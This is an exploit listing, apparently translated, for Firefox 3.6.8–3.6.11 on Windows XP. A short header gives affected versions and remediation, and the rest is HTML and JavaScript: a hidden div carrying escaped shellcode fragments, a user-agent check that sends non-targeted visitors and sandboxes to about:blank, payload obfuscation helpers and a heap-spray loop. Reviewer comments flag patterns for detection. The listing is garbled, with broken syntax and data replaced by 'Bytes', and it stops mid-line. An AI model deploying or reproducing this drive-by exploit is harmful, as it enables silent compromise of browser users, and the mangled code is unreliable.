1. program name: ff3610
2. Affected software versions
System platform: Windows XP SP2, SP3
Software platform: Firefox versions 3.6.8, 3.6.9, 3.6.10, 3.6.11
The exploit may consume a large amount of memory. On machines with 1 GB of memory or less, Firefox prompts you to continue running the script; after you click to continue, the script runs for about 1 minute and the chance of success is not high. Machines with 2 GB of memory or more run it fast. Both the memory growth and the slow-script prompt are observable signs on the client.
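3. Vulnerability remediation
Updating Firefox fixes the vulnerability, but the exploit can still be effective against machines that have not been shut down for a long time, presumably because a browser that has been left running has not yet restarted into the updated version. Many people have already worked on this and the vulnerability has been patched, so the code is published here for research and study.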
EXP:
<!--
  Data section of the page: a hidden, zero-size container whose child divs
  (sun8, sun9, sun10, sun11, suv) hold text that the script further down reads
  back (sun8 is read through innerHTML).
  NOTE(review): in this copy the original div contents appear to have been
  replaced by the word "Bytes"; only a few residual uXXXX runs remain, so the
  data is incomplete as shown.
  For detection: a visibility:hidden, 0x0 container carrying long escaped-data
  strings that script later pulls out via innerHTML is a pattern worth flagging
  when inspecting page content.
-->
<Body>
<Div style = "visibility: hidden; width: 0px; height: 0px">
<Div id = sun8> resize
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
</Div>
<Div id = sun9> resize
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
0d78u5500u1001u57A8u0d78ud761u1004 </div>
<Div id = sun10> resize
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Actions </div>
<Div id = sun11> resize
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000 </div>
<Div id = suv> renew
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
735cu7663u6f68u7473u652eu6578u0022uffffuffffuffffffff </div>
</Div>
<Body>
<!-- External script reference; the attribute is malformed in this listing
     ("src?scvhost.txt", presumably src=...). The referenced file is not part
     of this page. -->
<Script src?scvhost.txt> </script>
<Script type = "text/javascript">
// check(): user-agent gate. Lower-cases navigator.userAgent and returns a short
// tag string naming which Firefox 3.6.x build was matched.
// NOTE(review): this listing is mangled (capitalised keywords, "=" / "&" / "! ="
// where comparisons and a logical AND were presumably meant, stray spaces inside
// the string literals), so it does not run as shown.
// Apparent intent: no "windows nt 6.0"/"windows nt 6.1" marker (i.e. not
// Vista / Windows 7) and exactly one of firefox/3.6.8 .. 3.6.11 present
// -> "8" / "9" / "10" / "11"; every other client -> "0".
// The top-level code later on this page sends a "0" client to about:blank, so a
// crawler or sandbox with a different user agent only ever observes that redirect.
Function check (){
Var temp = "";
Var user = navigator. userAgent. toLowerCase ();
// indexOf() yields -1 when the substring is absent from the user agent.
Var a = user. indexOf ("windows nt 6.1 ");
Var B = user. indexOf ("windows nt 6.0 ");
Var c = user. indexOf ("firefox/3.6.8 ");
Var d = user. indexOf ("firefox/3.6.9 ");
Var e = user. indexOf ("firefox/3.6.10 ");
Var f = user. indexOf ("firefox/3.6.11 ");
// Each branch below requires both NT 6.x markers absent and one specific
// Firefox build present (the "! =" term) with the other three absent.
If (a =-1 & B =-1 & c! =-1 & d =-1 & e =-1 & f =-1 ){
Temp = "8 ";
}
Else if (a =-1 & B =-1 & c =-1 & d! =-1 & e =-1 & f =-1 ){
Temp = "9 ";
}
Else if (a =-1 & B =-1 & c =-1 & d =-1 & e! =-1 & f =-1 ){
Temp = "10 ";
}
Else if (a =-1 & B =-1 & c =-1 & d =-1 & e =-1 & f! =-1 ){
Temp = "11 ";
}
Else {
// No supported combination matched: return the "not targeted" tag directly.
Return temp = "0 ";
}
Return temp;
}
// de(su): decoding helper. `su` is indexed like an array of hexadecimal strings;
// each entry is parsed with parseInt(..., 16), turned into a character with
// String.fromCharCode, and appended to one string, which is then passed through
// unescape() and returned.
// For analysts: because the final text only exists after this hex -> char ->
// unescape chain, the decoded data does not appear literally in the page source.
Function de (su ){
Var I; var sun = "";
For (I = 0; I <su. length; I ++ ){
Sun + = String. fromCharCode (parseInt (su [I], 16 ));
}
Return unescape (sun );
}
// code(beastk): string re-encoding wrapper around de().
// Steps visible in the body:
//   1. cut the input into 5-character chunks, each prefixed with "m";
//   2. split on "m" and call toString(), which joins the pieces with commas;
//   3. convert every character to its hex char code, substituting "25"
//      (hex for "%") wherever the code is "2c" (hex for ",");
//   4. hand the resulting array to de().
// Net effect, as far as the code shows: a "%" ends up in front of each
// 5-character chunk before de() calls unescape(), so the page never contains
// the "%u" escape form literally.
// NOTE(review): I and j are used without a declaration in this function, and the
// comparison on the "2c " line is written with a single "=" and a trailing space
// in the literal; both look like artefacts of the mangled listing.
Function code (beastk ){
Var nop = "";
Var len = beastk. length;
For (I = 0; I <len ;){
Nop = nop + "m" + beastk. substring (I, I + 5 );
I = I + 5;
}
Nop = nop. split ("m"). toString ();
Var temp = new Array ();
For (j = 0; j <nop. length; j ++ ){
If (nop. charCodeAt (j). toString (16) = "2c "){
Temp. push ("25 ");
}
Else {
Temp. push (nop. charCodeAt (j). toString (16 ));
}
}
Return de (temp );
}
// getatts(str): creates an element with tag name `str`, gives it the id
// "testcase ", appends it to document.body, looks it up again by that id, and
// collects the names of all enumerable properties whose value is a string.
// The temporary element is removed from the body before the array of property
// names is returned.
Function getatts (str ){
Var cobj = document. createElement (str );
Cobj. id = "testcase ";
Document. body. appendChild (cobj );
Var obj = document. getElementById ("testcase ");
Var atts = new Array ();
// for-in walks the element's enumerable properties, including inherited ones.
For (p in obj ){
If (typeof (obj [p]) = "string "){
Atts. push (p );
}
}
Document. body. removeChild (cobj );
Return atts;
}
Var ck = check ();
Var bk = "mp. ojsyex5 ";
Var array = new Array ();
Var ls = 0x100000-(bk. length * 2 + 0x01020 );
Var b1 = ""; // 111111111111111111111111111111
If (ck = "0 "){
Location. href = "about: blank ";
}
Else {
If (ck = "8 "){
B1 = code ("u0d0du0d0d ");
}
If (ck = "9 "){
B1 = code ("uef52u100a ");
}
If (ck = "10 "){
B1 = code ("ub8b7u1029 ");
}
If (ck = "11 "){
B1 = code ("u4bc8u1000 ");
}
Var B = b1;
While (B. length <(0x85750-0x1000)/2 ){
B + = b1
};
//// // 2222222222222222222
Var sun = "";
Var sun8 = document. getElementById ("sun8"). innerHTML;
Var sun9 = document. get